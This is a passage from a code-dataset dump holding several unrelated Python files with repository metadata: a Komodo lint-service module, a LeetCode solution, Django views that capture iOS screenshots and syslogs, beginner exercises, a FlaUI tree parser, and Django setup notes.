cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(languageName):
self._linterCIDsByLanguageName[languageName] = {'terminals':[],
'aggregator':None}
self._linterCIDsByLanguageName[languageName]['terminals'].append(cid)
#log.debug("Loaded these linters: %s", self._linterCIDsByLanguageName)
def _getCategoryNameFromNameObj(self, nameObj):
nameObj.QueryInterface(components.interfaces.nsISupportsCString)
rawName = nameObj.data
try:
fixedName = urllib2.unquote(rawName)
except:
fixedName = rawName
return rawName, fixedName
def getLinter_CID_ForLanguage(self, languageName):
return self._getLinterCIDByLanguageName(languageName)
def observe(self, subject, topic, data):
#print "file status service observed %r %s %s" % (subject, topic, data)
if topic == 'xpcom-shutdown':
log.debug("file status got xpcom-shutdown, unloading");
self.terminate()
def terminate(self):
log.info("KoLintService.terminate()")
self.requests.prepend(None) # prepend the quit sentinel
self._shuttingDown = 1
# Do NOT attempt to .join() the manager thread because it is nigh on
# impossible to avoid all possible deadlocks.
def getTerminalLintersForLanguage(self, languageName):
return [self._getLinterByCID(cid)
for cid in self._linterCIDsByLanguageName[languageName]['terminals']]
GENERIC_LINTER_AGGREGATOR_CID = "@activestate.com/koGenericLinterAggregator;1"
def _getLinterCIDByLanguageName(self, languageName):
try:
linters = self._linterCIDsByLanguageName[languageName]
except KeyError:
self._linterCIDsByLanguageName[languageName] = {'aggregator':None,
'terminals':[],
'generated':True}
return None
# If there's no explicit aggregator, return the first terminal linter.
# If there isn't one, throw the ItemError all the way to top-level
if linters['aggregator'] is not None:
return linters['aggregator']
if len(linters['terminals']) != 1:
if len(linters['terminals']) == 0:
if not linters.get('generated', False):
log.error("No terminal linters for lang %s", languageName)
return None
# Create a generic aggregator for this language.
linters['aggregator'] = (self.GENERIC_LINTER_AGGREGATOR_CID
+ ":" + languageName)
return linters['aggregator']
return linters['terminals'][0]
def getLinterForLanguage(self, languageName):
"""Return a koILinter XPCOM component of the given linterCID.
This method cache's linter instances. If there is no such linter
then an exception is raised.
Note that aggregators are favored over terminal linters.
"""
linterCID = self._getLinterCIDByLanguageName(languageName)
if linterCID is None:
return None
return self._getLinterByCID(linterCID)
def _getLinterByCID(self, linterCID):
if linterCID not in self._linterCache:
try:
if linterCID.startswith(self.GENERIC_LINTER_AGGREGATOR_CID):
languageName = linterCID[len(self.GENERIC_LINTER_AGGREGATOR_CID) + 1:]
linter = components.classes[self.GENERIC_LINTER_AGGREGATOR_CID].createInstance(components.interfaces.koILinter)
UnwrapObject(linter).initialize(languageName, self)
elif linterCID not in components.classes.keys():
linter = None
else:
linter = components.classes[linterCID].createInstance(components.interfaces.koILinter)
except COMException, ex:
errmsg = "Internal Error creating a linter with CID '%s': %s"\
% (linterCID, ex)
raise ServerException(nsError.NS_ERROR_UNEXPECTED, errmsg)
self._linterCache[linterCID] = linter
return self._linterCache[linterCID]
def addRequest(self, request):
"""Add the given request to the queue.
If there is an error (e.g. bogus linterType) an exception is raised.
"""
log.info("KoLintService.addRequest(%s)", request.describe())
# Fill out the request (because document access and component
# creation must often be done in the main thread).
request.content = request.koDoc.buffer
request.encoding = request.koDoc.encoding
if request.linterType:
request.linter = self.getLinterForLanguage(request.linterType)
self.requests.put(request)
def cancelPendingRequests(self, uid):
log.info("KoLintService.cancelPendingRequests(uid='%s')", uid)
self.requests.remove_uid(uid)
# This does nothing to stop the reporting of results from a
# possible _currently running_ lint request for this uid.
# This is currently handled on the JavaScript side via the
# koILintRequest.rid attribute.
def _getEncodingLintResults(self, content, encoding):
"""Return lint results for encoding errors in the given document.
"content" is the document content as a unicode string
"encoding" is the currently selected encoding for the document
Returns a koLintResults instance.
"""
try:
encodedString = content.encode(encoding.python_encoding_name,
"strict")
except UnicodeError, ex:
pass # errors are handled after the try/except/else block
else:
return koLintResults() # no encoding errors
# Find the specific errors by encoding with "replace" and finding
# where those replacements were.
escapedContent = content.replace('?', 'X')
encodedString = escapedContent.encode(encoding.python_encoding_name,
"replace")
offset = 0
indeces = []
while 1:
index = encodedString.find('?', offset)
if index == -1:
break
indeces.append(index)
offset = index + 1
log.debug("encoding errors at indeces %s", indeces)
results = koLintResults()
lines = content.splitlines(1) # keep line terminators
offset = 0 # the current offset in the document
for i in range(len(lines)):
line = lines[i]
while indeces and indeces[0] < offset + len(line):
index = indeces.pop(0) # this index is on this line
r = KoLintResult()
r.description = "This character cannot be represented with "\
"the current encoding: '%s'"\
% encoding.python_encoding_name
r.lineStart = i+1
r.lineEnd = i+1
r.columnStart = index - offset + 1
r.columnEnd = r.columnStart + 1
log.debug("encoding error: index=%d: %d,%d-%d,%d", index,
r.lineStart, r.columnStart, r.lineEnd, r.columnEnd)
r.severity = r.SEV_ERROR
results.addResult(r)
if not indeces:
break
offset += len(line)
else:
raise ValueError("Did not find line and column for one or "
"more indeces in content: %s" % indeces)
return results
def _addMixedEOLWarnings(self, results, content, expectedEOL):
"""Add lint results (at the WARNING level) for each line that has
an unexpected EOL.
"results" in a koILintResults to which to add mixed EOL results.
"content" is the content to analyze
"expectedEOL" is the currently configured EOL for the document,
this must be on of the EOL_LF, EOL_CR, EOL_CRLF constants.
"""
import eollib
mixedEOLs = eollib.getMixedEOLLineNumbers(content, expectedEOL)
if not mixedEOLs:
return
def collapseContinuousLineNumbers(lineNos):
"""Return a collapsed group of continuous line numbers."""
results = []
start = -10
last = -10
for lineNo in lineNos:
if lineNo == last+1:
pass
else:
if start >= 0:
results.append((start, last))
start = lineNo
last = lineNo
if start >= 0:
results.append((start, last))
return results
# Add a warning lint result for each such line.
expectedEOLStr = eollib.eol2eolPref[expectedEOL]
lines = content.splitlines(1)
# For performance reasons, we collapse groups of continuous line
# numbers into the one line result - bug 92733.
for lineStart, lineEnd in collapseContinuousLineNumbers(mixedEOLs):
r = KoLintResult()
r.description = "This line does not end with the expected "\
"EOL: '%s' (select View | View EOL Markers)"\
% expectedEOLStr
r.lineStart = lineStart+1
r.lineEnd = lineEnd+1
r.columnStart = 1
r.columnEnd = len(lines[lineEnd]) + 1
r.severity = r.SEV_WARNING
results.addResult(r)
# When a new panel is added for a language in
# pref-syntax-checking.xul, we'll need to pull the generic marker
# out of any documents that adopted it. We can either do it when
# we open the doc (although we have to wait until we know its language),
# but this way we only check when we're about to lint.
#
# Also, it's too bad that doc prefs aren't versioned.
_no_longer_generic_languages = ["Python3", "HTML5"]
def _passesGenericCheck(self, request):
prefs = request.koDoc.prefs
languageName = request.koDoc.language
genericCheck = "genericLinter:" + languageName
if not prefs.hasPref(genericCheck):
return True
if languageName in self._no_longer_generic_languages:
prefs.deletePref(genericCheck)
return True
return prefs.getBooleanPref(genericCheck)
def run(self):
"""Process lint requests serially until told to stop.
Before the requested linter is run on a document it is first checked
for encoding problems (i.e. encoding is not sufficient for current
content).
"""
TIME_LINTS = False
log.info("manager thread: start")
while 1:
try:
# wait for next request
request = self.requests.get()
# quit if request is the quit sentinel
if request is None:
log.info("manager thread: quit sentinel")
break
# process the request
if TIME_LINTS: startlint = time.clock()
log.info("manager thread: process request: %r", request)
try:
# Look for encoding errors first.
results = self._getEncodingLintResults(request.content,
request.encoding)
if TIME_LINTS: endencodinglint = time.clock()
# If there were no encoding errors, try the
# requested linter.
if not results.getNumResults() and request.linter:
#XXX This is where context-sensitive linting args should
# be passed in, but linters don't support this yet.
log.debug("manager thread: call linter.lint(request)")
try:
if self._passesGenericCheck(request):
results = request.linter.lint(request)
#results = UnwrapObject(request.linter).lint(request)
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
except:
log.exception("Unexpected error while linting")
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
log.debug("manager thread: linter.lint(request) returned")
if TIME_LINTS: endlintlint = time.clock()
prefset = getProxiedEffectivePrefs(request)
if prefset.getBooleanPref("lintEOLs"):
# Also look for mixed-line endings warnings.
self._addMixedEOLWarnings(results, request.content,
request.koDoc.new_line_endings)
if TIME_LINTS:
endeollint = time.clock()
print "lint of '%s': encoding=%.3fs lint=%.3fs eol=%.3fs"\
% (request.koDoc.baseName,
endencodinglint-startlint,
endlintlint-endencodinglint,
endeollint-endlintlint)
request.results = results
except (ServerException, COMException), ex:
request.errorString = str(ex)
except:
# Any exceptions that are not ServerException or
# COMException are unexpected internal errors.
try:
err = "unexpected internal error checking '%s' with '%s' linter"\
% (request.koDoc.baseName, request.linterType)
log.exception(err)
request.errorString = err
except:
err = "Unexpected error in koLintService.run"
log.error(err)
request.errorString = err
else:
log.info("manager thread: lint results for uid %s: %r",
request.uid, results)
# Notify of request completion
# Note: this is not guaranteed to properly guard the proxy
# call because a context switch could happen in between the
# condition check and body. That is ok though. At worst it
# will raise an exception that will be trapped just below.
# The point is to catch the common case. I am pretty sure
# that there is no way to do this properly without going
# to great lengths.
if not self._shuttingDown:
try:
# Proxy this so the worker thread can report results on this iface.
lintBufferProxy = getProxyForObject(1,
components.interfaces.koILintBuffer, request.lintBuffer,
PROXY_ALWAYS | PROXY_SYNC)
lintBufferProxy.reportResults(request)
except COMException, ex:
# Ignore this error, which will happen if results
# are reported after the buffer has gone away (i.e.
# the file owning that buffer was closed):
# Traceback (most recent call last):
# File "...\koLintService.py", line 370, in run
# request.lintBuffer.reportResults(request)
# File "<XPCOMObject method 'reportResults'>", line 3, in reportResults
# Exception: 0x80570021 ()
errno = ex.args[0]
if errno == 0x80570021:
pass
else:
raise
except:
# Something bad happened, but don't let this thread die.
log.exception("unexpected error in the linting thread")
log.info("manager thread: end")
if __name__ == "__main__":
    # Ad-hoc manual exercise of RequestQueue (Python 2 print statements).
    logging.basicConfig()
    import pprint
    class TestRequest:
        # Minimal stand-in for KoLintRequest: only a uid is needed.
        def __init__(self, uid):
            self.uid = uid
        def __repr__(self):
            return "<TestRequest: uid=%s>" % self.uid
    q = RequestQueue()
    if 0:
        # put/remove leaves an empty queue, so this q.get() blocks forever;
        # kept disabled on purpose.
        q.put(TestRequest("id_1"))
        q.remove_uid("id_1")
        print "item:"
        sys.stdout.flush()
        print q.get()
    if 1:
        # Exercise put/prepend/get and uid-based removal, dumping the
        # internal list after each step.
        q.put(TestRequest("id_1"))
        q.put(TestRequest("id_2"))
        pprint.pprint(q.queue)
        print "item: ", q.get()
        q.put(TestRequest("id_3"))
        q.put(TestRequest("id_4"))
        q.put(TestRequest("id_3"))
        q.prepend(None)
        pprint.pprint(q.queue)
        q.remove_uid("id_3")
        pprint.pprint(q.queue)
        q.remove_uid("id_3")
        sys.stdout.flush()
        pprint.pprint(q.queue)
        q.remove_uid("id_4")
        pprint.pprint(q.queue)
        print "item: ", q.get()
        print "item: ", q.get()
        pprint.pprint(q.queue)
|
[
"jpsutton@madisoncollege.edu"
] |
jpsutton@madisoncollege.edu
|
aa80166792010844c80020d87de369afec96d42a
|
5eff9df4d276e83c68ce843d58868499858f701a
|
/Leetcode - FB/p0350.py
|
3780986eb5c2d856d4e29deeeacac48b9f10fdf7
|
[] |
no_license
|
arunraman/Code-Katas
|
b6723deb00caed58f0c9a1cafdbe807e39e96961
|
7fe3582fa6acf59a2620fe73e1e14bd8635bbee8
|
refs/heads/master
| 2023-03-04T17:27:44.037145
| 2023-03-02T21:09:53
| 2023-03-02T21:09:53
| 25,232,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
class p0349(object):
    """LeetCode 350: intersection of two arrays, keeping multiplicity."""
    def intersectiontwoArrays(self, nums1, nums2):
        """Return elements common to nums1 and nums2; each element appears
        as many times as it occurs in both, in nums2 order."""
        counts = {}
        for value in nums1:
            counts[value] = counts.get(value, 0) + 1
        intersection = []
        for value in nums2:
            if counts.get(value, 0) > 0:
                intersection.append(value)
                counts[value] -= 1
        return intersection
# Ad-hoc smoke check (Python 2 print statement); expected output: [2, 2].
S = p0349()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2])
|
[
"arunraman.19@gmail.com"
] |
arunraman.19@gmail.com
|
615af52a6dfc9a4109231f08258cb4464601be9f
|
daa513724c547b06fdd6b52764d217db09fe6204
|
/iosapp/views.py
|
33dd5ffa2576380fb01eecca0ead1d4a0919c2e2
|
[] |
no_license
|
sunkeqiao/TMT-Server
|
4f95c75500f216f6694ce84eafab7b18b02eb772
|
e23b75a2f0cfc6960f788b3d0e6727614aea3c02
|
refs/heads/master
| 2020-09-01T10:26:50.834786
| 2019-06-19T16:14:31
| 2019-06-19T16:14:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,988
|
py
|
from django.http import Http404
from rest_framework import generics, mixins, views
from rest_framework.response import Response
from .models import *
from django.conf import settings
import json
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from .serializers import *
from .libimobiledevice import Libimobiledevice
import threading, time
# Cached connection to the Mac-side libimobiledevice helper; None until
# the first successful connect.
lib_mobile = None
def keep_connect_mac():
    """Return a (cached) Libimobiledevice connection, or False when the
    Mac helper cannot be reached.

    NOTE(review): a cached connection is returned without a liveness
    check — a dropped connection stays cached; confirm against callers.
    """
    global lib_mobile
    if lib_mobile:
        return lib_mobile
    try:
        lib_mobile = Libimobiledevice()
        return lib_mobile
    except Exception:  # connection failure: leave the cache empty
        lib_mobile = None
        return False
# Try to connect eagerly at import time so the first request is fast.
keep_connect_mac()
class DeviceObject(views.APIView):
    """List the iOS devices visible to the current session user."""
    def get(self, request):
        """Return public devices plus those owned by the session user."""
        username = request.session['user'].get('username')
        queryset = iOSDevice.objects.filter(owner__in=('public', username))
        payload = iOSDeviceSerializer(queryset, many=True).data
        return Response({"status": True, "message": "成功", "data": payload})
class DeviceScreenShotObject(views.APIView):
    """Take a screenshot on a device and push the result to the user's channel."""
    def post(self, request, uuid):
        """Trigger screenshot + device-info upload for device *uuid*."""
        username = request.session['user'].get('username')
        if not keep_connect_mac():
            return Response({"status": False, "message": "MAC服务器不在线", "data": ""})
        # Take the screenshot, collect device info, and upload both.
        result = lib_mobile.screenshot_device_info_then_upload(uuid, username)
        if not result.get('file_info'):
            return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
        # Notify the requesting user over their channels group.
        payload = {
            "device_info": deal_with_device_info(result.get('device_info')),
            "message": result.get('file_info'),
            "room": f"{username}_ios",
            "to": username,
            "type": "message"
        }
        async_to_sync(get_channel_layer().group_send)(username, payload)
        return Response({"status": True, "message": "成功", "data": ""})
class DeviceLogCatObject(views.APIView):
    """Start/stop syslog capture on an iOS device."""
    def post(self, request, uuid):
        """Dispatch on ``action`` in the request body:

        - "start": begin capture and schedule an automatic stop.
        - "stop": stop capture, upload the log, and notify the user.
        - "delay_stop": watchdog-issued stop (see delay_stop()).
        """
        to = request.session['user'].get('username')
        action = request.data.get('action')
        if not keep_connect_mac():
            return Response({"status": False, "message": "MAC服务器不在线", "data": ""})
        if action == 'start':
            try:
                if lib_mobile.syslog_start(uuid):
                    # Watchdog: force-stop the capture if the client never does.
                    threading.Thread(target=self.delay_stop, args=(request, uuid,)).start()
                    return Response({"status": True, "message": "成功", "data": ""})
                else:
                    return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
            except Exception as e:
                return Response({"status": False, "message": str(e), "data": ""})
        elif action == 'stop':
            # Stop the capture, gather device info, and upload both.
            response = lib_mobile.syslog_device_info_then_upload(uuid, to)
            if not response.get('file_info'):
                return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
            # Notify the requesting user over their channels group.
            channel_layer = get_channel_layer()
            async_to_sync(channel_layer.group_send)(to, {
                "device_info": deal_with_device_info(response.get('device_info')),
                "message": response.get('file_info'),
                "room": f"{to}_ios",
                "to": to,
                "type": "message"
            })
            return Response({"status": True, "message": "成功", "data": ""})
        elif action == 'delay_stop':
            lib_mobile.syslog_stop(uuid)
            # BUG FIX: this branch used to return None, which makes DRF
            # error out when the action arrives via an external request.
            return Response({"status": True, "message": "成功", "data": ""})
        else:
            return Response({"status": False, "message": "action指令不正确", "data": ""})
    def delay_stop(self, request, uuid):
        """Watchdog body: wait ~2 minutes, then force a 'delay_stop' action."""
        time.sleep(125)
        request.data['action'] = 'delay_stop'
        self.post(request, uuid)
def deal_with_device_info(device_info):
    """Build a display dict (name/system/screen/memory/storage/charge)
    from a raw lockdownd info dict plus the BaseDeviceInfo table.

    NOTE(review): `base_device_info.get(...)` returns None for an unknown
    'ProductType', which would raise AttributeError below — confirm every
    supported model exists in BaseDeviceInfo.
    """
    # Index the static per-model table by model id (e.g. "iPhone10,3").
    baseinfo = BaseDeviceInfo.objects.all()
    base_device_info = {}
    for info in baseinfo:
        base_device_info[info.model_id] = info
    return {
        "device_name": base_device_info.get(device_info.get('ProductType')).name,
        "system": f"iOS {device_info.get('ProductVersion')}",
        "screen": base_device_info.get(device_info.get('ProductType')).screen,
        # ram is stored in MB; capacities below are reported in bytes.
        "memory": f"总容量:{round(int(base_device_info.get(device_info.get('ProductType')).ram)/1024.0,2)}GB",
        "storage": f"总容量{round(int(device_info.get('TotalDataCapacity'))/1024.0/1024.0/1024.0,2)}GB,可使用{round(int(device_info.get('TotalDataAvailable'))/1024.0/1024.0/1024.0,2)}GB",
        "charge": f"{device_info.get('BatteryCurrentCapacity')}%",
    }
|
[
"445462004@qq.com"
] |
445462004@qq.com
|
7085b43ca65f48b5500e2da986e2f06eda812634
|
b2eaa0024ba6c8c7986bf3e107deb7308e3658d0
|
/python/06_day/try_guess.py
|
494995380aa080787578df45b3f4f6c1e3b94487
|
[] |
no_license
|
olitskevich/szkolenie
|
aabf9589b0d5114761e77a0a4934821e1ba051ac
|
0e8d752e9753f262edae58d61795544c34fb6563
|
refs/heads/master
| 2020-04-25T05:51:52.234718
| 2019-03-09T14:42:56
| 2019-03-09T14:42:56
| 172,557,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 741
|
py
|
import random

# Number-guessing game: the player has up to `max_attempt` tries to find a
# random number in [0, 100]; Ctrl-C exits gracefully.
random_number = random.randint(0, 100)
attempt = 0
max_attempt = 7
my_number = 555  # sentinel outside [0, 100] so the loop always starts
try:
    while my_number != random_number:
        print("Your number: ")  # FIX: was misspelled "mumber"
        my_number = int(input())
        attempt += 1
        if my_number == random_number:
            # FIX: message typos ("Congratulation", "attemp") corrected.
            print("Congratulations! You've guessed the number from the", attempt, "attempt")
        else:
            if my_number > random_number:
                print("Choose smaller number")
            else:
                print("Choose bigger number")
            if attempt >= max_attempt:
                print("Sorry! You have no more attempts, the correct number is", random_number)
                break
except KeyboardInterrupt:
    print("Thanks for participation")
|
[
"olgalickewicz@uber.com"
] |
olgalickewicz@uber.com
|
d261d6ca537220689a62cbf436cb312e521bf1d7
|
7289ebef10cdb7b7cbd834d749f46ace65624941
|
/7- Introduction - Fonctions/fonction.py
|
3f23f0678e2dcbcd67977a84f4f4e3669d0d1298
|
[] |
no_license
|
633-1-ALGO/introduction-python-FrankTheodoloz
|
14e7157371b707dcf26688818cdbeb4090526a8b
|
20aa27aa2bc8c562260e23c8cc30f3d0dcdc5a5c
|
refs/heads/master
| 2020-07-29T20:01:15.802637
| 2019-10-06T17:51:06
| 2019-10-06T17:51:06
| 209,942,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
# Example function with a default parameter value.
def multiplication(n, m, p=1):
    """Print n*m, then n*m*p (p defaults to 1)."""
    product = n * m
    print(product)
    print(product * p)


multiplication(3, 4)
print()
multiplication(3, 4, 2)
|
[
"dhteodoro@gmail.com"
] |
dhteodoro@gmail.com
|
75ccd35c5fba5907e941b6f34fb90120507e400e
|
649d435286f4ead4ca29feea4f6766c8ae03f475
|
/src/FlaUILibrary/flaui/util/treeitemsparser.py
|
af1fa3c59c08ce665e0de02dee95aeda188ddce5
|
[
"MIT",
"Python-2.0"
] |
permissive
|
minatuyang/robotframework-flaui
|
1fe1c5555781d6d288bfe2eabbe12840050af77e
|
352851193265d62ab8282dd9ac2a416fe47e4717
|
refs/heads/main
| 2023-06-21T23:35:22.385202
| 2021-07-20T16:06:48
| 2021-07-20T20:30:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
from FlaUILibrary.flaui.exception import FlaUiError
class TreeItemsParser:
""" Helper class which handles the management of the given location string.
The location is used to locate the exact tree item in the tree control.
Examples:
location = N:Nameofitem1->N:Nameofitem2->N:Nameofitem3
location = I:indexofitem1->I:indexofitem2->I:indexofitem3
location = N:Nameofitem1->I:indexofitem2->I:indexofitem3
"""
def __init__(self, location):
self.location = location.split("->")
def get_treeitem(self, treeitems, index):
""" This function gets the index of the location, the location can either be name or index,
and returns the corresponding tree item to that name or index.
if the given name or index is not found a flauierror will be thrown.
"""
loc = self.location[index]
if loc.startswith("I:"):
loc = loc[2:]
try:
return treeitems[int(loc)]
except IndexError:
raise FlaUiError(FlaUiError.ArrayOutOfBoundException.format(int(loc))) from None
elif loc.startswith("N:"):
loc = loc[2:]
for item in treeitems:
if item.Name == loc:
return item
raise FlaUiError(FlaUiError.ElementNameNotFound.format(loc))
else:
raise FlaUiError(FlaUiError.FalseSyntax.format(loc)) from None
def is_last_element(self, index):
"""Retruns true if the index corresponds the last element of given location series.
"""
if index==len(self.location)-1:
return True
return False
|
[
"andreas.sekulski@gmail.com"
] |
andreas.sekulski@gmail.com
|
bb883369d18920a27cc801735cf6b29fead3ce45
|
58c4acb298cfd1c47157d5ec657829f7465b64e5
|
/cable/tests.py
|
0f012306a8f13a4c0098fb07e71ed66f04ba8bae
|
[] |
no_license
|
AlexsandroMO/Cables_Projcts
|
c5b72e75a58e155dd7b17971793fcddef5fe4526
|
6ede9efc591d638769ded1ac75fa41d43e804496
|
refs/heads/master
| 2020-12-05T01:33:07.409735
| 2020-01-11T23:41:58
| 2020-01-11T23:41:58
| 231,967,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
from django.test import TestCase

# Create your tests here.
#https://www.geeksforgeeks.org/textfield-django-models/
# FIX: an unresolved git merge conflict (<<<<<<< HEAD / ======= / >>>>>>>
# homolog) lived here and made this module unparseable; both sides were
# reference links, so both are kept.
#https://realpython.com/django-redirects/#passing-parameters-with-redirects
#https://www.w3schools.com/css/css_table.asp
#pip3 install django-crispy-forms
#Zerar senha do admin
#python manage.py shell
#from django.contrib.auth.models import User
#User.objects.filter(is_superuser=True)
#usr = User.objects.get(username='nome-do-administrador')
#usr.set_password('nova-senha')
#usr.save()
'''Upload documents on Github
git clone <nome>
<entra na pasta criada>
git add .
git commit -m "texto"
git push
git pull
'''
'''git checkout -b nome cria uma branch
git checkout nome entra na branch
git branch - verifica as branchs
git checkout master - entra na master
git merge origin "nome"
git push origin master - subir commit
git branch -D "nome"- deletar branch
'''
#Heroku
#https://github.com/Gpzim98/django-heroku
#git add .gitignore
#colocar no gitignore
'''.idea
.pyc
.DS_Store
*.sqlite3'''
'''
Publishing the app
git add .
git commit -m "Configuring the app"
git push heroku master --force
'''
'''
def newTask(request):
    if request.method == 'POST':
        form = ResidencDimensForm(request.POST)
        if form.is_valid():
            task = form.save(commit=False)
            task.total_va = (task.potencia_va * task.quant)
            task.corrente_a = (task.total_va / task.tensa_va)
            #queda = task.sessao_condutor
            #test = main.read_sql_queda(queda)
            #task.queda_tensao_ckt = ((((test['queda_tesao'] * task.corrente_a) * task.comprimento) / 1000) / task.total_va)
            task.save()
            return redirect('/')
    else:
        form = ResidencDimensForm()
    return render(request, 'cable/add-task.html', {'form': form})
'''
#urls ID
#https://stackoverflow.com/questions/15608295/passing-an-id-in-django-url
|
[
"noreply@github.com"
] |
AlexsandroMO.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.